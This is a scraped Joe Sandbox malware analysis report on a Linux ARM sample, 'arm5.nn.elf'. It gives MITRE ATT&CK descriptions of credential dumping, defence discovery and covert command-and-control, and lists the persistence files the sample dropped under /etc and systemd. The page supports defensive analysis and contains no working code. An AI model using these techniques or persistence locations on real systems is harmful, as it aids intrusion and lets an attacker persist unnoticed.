Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report arm5.nn.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/boot/bootcmd

/etc/init.d/arm5.nn.elf

/etc/init.d/system

/etc/inittab

/etc/motd

/etc/profile

/etc/rc.local

/etc/systemd/system/custom.service

/memfd:snapd-env-generator (deleted)

/tmp/qemu-open.wudUkZ (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

System Behavior

Analysis Process: arm5.nn.elf PID: 6239, Parent PID: 6161

General

Chronological Activities

Analysis Process: arm5.nn.elf PID: 6261, Parent PID: 6239

General

Chronological Activities

Analysis Process: sh PID: 6261, Parent PID: 6239

General

Chronological Activities

Analysis Process: sh PID: 6267, Parent PID: 6261

Linux Analysis Report
arm5.nn.elf